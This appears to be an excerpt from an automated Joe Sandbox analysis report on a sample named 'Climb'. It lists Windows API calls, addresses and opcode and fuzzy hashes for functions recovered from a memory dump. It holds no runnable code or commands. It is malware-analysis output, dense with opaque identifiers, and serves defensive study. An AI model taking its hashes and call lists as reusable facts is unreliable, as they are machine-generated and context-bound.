                                                                                                                                                                      • String ID: <$@
                                                                                                                                                                      • API String ID: 146682121-1426351568
                                                                                                                                                                      • Opcode ID: b8ff87dfd0778e581360ad3d94e92f31c7963870711dae4dc07d82ce853f46ea
                                                                                                                                                                      • Instruction ID: daa939c4c1a7d06e42dca1ca23628ee3c5ac05aaff2578cca3b8a82c51ccfccf
                                                                                                                                                                      • Opcode Fuzzy Hash: b8ff87dfd0778e581360ad3d94e92f31c7963870711dae4dc07d82ce853f46ea
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F716874A00219DFDB10DF55C494A9EBBF4FF08304F04849DE959AB292CB74ED45DB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005848D1
                                                                                                                                                                      • IsMenu.USER32(?), ref: 005848E6
                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0058492E
                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00584941
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 3076010158-4108050209
                                                                                                                                                                      • Opcode ID: 326719d648e90d993531de969ee39e49c5cb8fd9e9bc014c9e238f887a913109
                                                                                                                                                                      • Instruction ID: 91747e3bae826adc2394317022e45d321168ff0a40c994a85670c176ede53ea6
                                                                                                                                                                      • Opcode Fuzzy Hash: 326719d648e90d993531de969ee39e49c5cb8fd9e9bc014c9e238f887a913109
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F413875A0120AEFDB20EF51D884EAABBB9FF16324F044129ED55A7250D730AD54DF60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 005545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00554620
                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005527B3
                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005527C6
                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 005527F6
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                                                                                      • Opcode ID: 01533282edd55ed687c51a3299cb82e6f437f1df34cff0f70cd68fe0c2e465ae
                                                                                                                                                                      • Instruction ID: a712610733e535115022a27fc051857f49c021f964126127e9bca52823812cb6
                                                                                                                                                                      • Opcode Fuzzy Hash: 01533282edd55ed687c51a3299cb82e6f437f1df34cff0f70cd68fe0c2e465ae
                                                                                                                                                                      • Instruction Fuzzy Hash: 0921E471940108BADB05ABA0DC56DFE7FB8EF46364F10412AF911A71E1DB38494D9B60
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00583A29
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00583A30
                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00583A45
                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00583A4D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                                                                      • Opcode ID: d04e9e39aa210b5e5a891d9237362a4d952bce33d2581af1959791411730199b
                                                                                                                                                                      • Instruction ID: 9aab9fa915063aa6d687c5c12430f263e02a2741c2993fc8ee73fd4a75e65a74
                                                                                                                                                                      • Opcode Fuzzy Hash: d04e9e39aa210b5e5a891d9237362a4d952bce33d2581af1959791411730199b
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D219D71600209ABEF14AFA4DC84FBB7BE9FB54B64F105618FE91A21E0D771CD41A760
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00589A5D
                                                                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00589A72
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00589ABA
                                                                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00589AF0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 2864067406-3685820393
                                                                                                                                                                      • Opcode ID: 342f0f3bf41eab552e8b7f323146b4ad605642d681c66116e60d9855137b7b4d
                                                                                                                                                                      • Instruction ID: 05bea93b2eae21533d257db2179f05e8b6894dc294163d82f696668d08c0cd23
                                                                                                                                                                      • Opcode Fuzzy Hash: 342f0f3bf41eab552e8b7f323146b4ad605642d681c66116e60d9855137b7b4d
                                                                                                                                                                      • Instruction Fuzzy Hash: AF21BC34600018AFCF29AF95CC88EFA7FB9FB49350F584169FD05AB1A1D7749950EB60
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 004F1AF4
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 005331F9
                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00533203
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0053320E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                      • String ID: (\
                                                                                                                                                                      • API String ID: 4127811313-3685820393
                                                                                                                                                                      • Opcode ID: 0ec5ea889114145457e07c05a6b896d6120b68963cfadebc7394d7ebd3688266
                                                                                                                                                                      • Instruction ID: a5a400e59dc1a21d06240346e3ec92b3b08282e1b89a91765abced68f3a07ecb
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ec5ea889114145457e07c05a6b896d6120b68963cfadebc7394d7ebd3688266
                                                                                                                                                                      • Instruction Fuzzy Hash: DF112531A0111DEBCF00EFA9C9859FE7BB8FB05354F100456EA02A3190D775AA95DBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0051508E,?,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002), ref: 005150FD
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00515110
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0051508E,?,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002,00000000), ref: 00515133
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 2a43b0133911d1e37ed460596368e1038e54907343f68dfd4a5b9a8c33384957
                                                                                                                                                                      • Instruction ID: 9cca3fdfb9dd98f82aa0fae45922803e94ffe7cb6cd2d575e798962656b7b77f
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a43b0133911d1e37ed460596368e1038e54907343f68dfd4a5b9a8c33384957
                                                                                                                                                                      • Instruction Fuzzy Hash: ECF0AF30A40619BBEB119F94DC09BEDBFF5FF54762F400064F805A21A0EB749A84DBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F664A
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004F665C
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F666E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                                                                      • Opcode ID: 2be2b8a2654295b8b5e5bafabaf735ba768c46b3aa1e3cc051f4024ca7b0e25b
                                                                                                                                                                      • Instruction ID: 173cf4317dfff95c4879e1b4c5d1f03740a0c36f62dc4dd79b4fa3f5e9d1d66f
                                                                                                                                                                      • Opcode Fuzzy Hash: 2be2b8a2654295b8b5e5bafabaf735ba768c46b3aa1e3cc051f4024ca7b0e25b
                                                                                                                                                                      • Instruction Fuzzy Hash: 64E0E63570162267E2212725BC0CB7B67B89F92F26B060116FD04F2294DF58CD05D7B9
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6610
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004F6622
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6635
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                                                                      • Opcode ID: dec1d1eaa74f96d351c776aa3f00ae815f0d2494cc47bc34444353df4b0d0645
                                                                                                                                                                      • Instruction ID: bc0768320d7cdda94ebcab151aa786453c646312dd7707a4b0849f7fe30d1ce0
                                                                                                                                                                      • Opcode Fuzzy Hash: dec1d1eaa74f96d351c776aa3f00ae815f0d2494cc47bc34444353df4b0d0645
                                                                                                                                                                      • Instruction Fuzzy Hash: ACD01235612A3567923227297C1DA9F6B64AEA6F213460016FD00F2394CF68CD06D7BC
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005635C4
                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00563646
                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0056365C
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0056366D
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0056367F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Delete$Copy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3226157194-0
                                                                                                                                                                      • Opcode ID: 49e863ddf5013dcb22a4b047549f5efa86e9d1cfc5116a0bdaf0e1bf2c073ec1
                                                                                                                                                                      • Instruction ID: 3fcd39e9fbd1b21f9b5d995162effd594745671056440a671f1e11957775108f
                                                                                                                                                                      • Opcode Fuzzy Hash: 49e863ddf5013dcb22a4b047549f5efa86e9d1cfc5116a0bdaf0e1bf2c073ec1
                                                                                                                                                                      • Instruction Fuzzy Hash: 61B16F72901119ABDF11EBA4CC89EDEBBBCFF48354F1040AAF609A7141EA349B448B61
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0057AE87
                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0057AE95
                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0057AEC8
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0057B09D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                                      • Opcode ID: 367d499284b8234f1537b4552230c24b532dfe6ea3f6752af1a5b5f91da36b12
                                                                                                                                                                      • Instruction ID: fbb40cb62b77d26dba3e8d0a867c1f20923c71eaac9689f6a9829d1a9c1043c9
                                                                                                                                                                      • Opcode Fuzzy Hash: 367d499284b8234f1537b4552230c24b532dfe6ea3f6752af1a5b5f91da36b12
                                                                                                                                                                      • Instruction Fuzzy Hash: 9CA1A0716003019FE720DF25D88AB2ABBE5BF84714F54881DF9599B2D2DB71EC408B86
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C505
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0057C560
                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0057C5C3
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 0057C606
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0057C613
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 826366716-0
                                                                                                                                                                      • Opcode ID: 6f6fd1478fb8dbc7b608fa34bdfab4b270bf863272f0cda09918fc75f0bba56e
                                                                                                                                                                      • Instruction ID: 25ef7613d325df05898784e016e1faa8515eef8767996a358c0f0f227490f276
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f6fd1478fb8dbc7b608fa34bdfab4b270bf863272f0cda09918fc75f0bba56e
                                                                                                                                                                      • Instruction Fuzzy Hash: 6461AE71208241AFC714DF14D894E2ABFE5FF84308F14899DF49A8B292DB31ED46DB92
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0055D7CD,?), ref: 0055E714
                                                                                                                                                                        • Part of subcall function 0055E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0055D7CD,?), ref: 0055E72D
                                                                                                                                                                        • Part of subcall function 0055EAB0: GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0055ED8A
                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0055EDC3
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055EF02
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055EF1A
                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0055EF67
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3183298772-0
                                                                                                                                                                      • Opcode ID: 5fb46a8c98240d385deecdf13135945a10f11e7916a37519d1f87800915015b2
                                                                                                                                                                      • Instruction ID: 5dd638fdfba15fe1a0d7e240940e704a5136ae4bf8d21b21dfb3f7a0e4c16610
                                                                                                                                                                      • Opcode Fuzzy Hash: 5fb46a8c98240d385deecdf13135945a10f11e7916a37519d1f87800915015b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 58514DB20083859BD724EB90D8969DBB7ECEF85351F00092FEA8593151EF35A68C8766
                                                                                                                                                                      APIs
                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00559534
                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 005595A5
                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 00559604
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00559677
                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005596A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4136290138-0
                                                                                                                                                                      • Opcode ID: 5e4432cc5ac328619a44b8c484359522a8df72df0732c2cf1931d161d413ae98
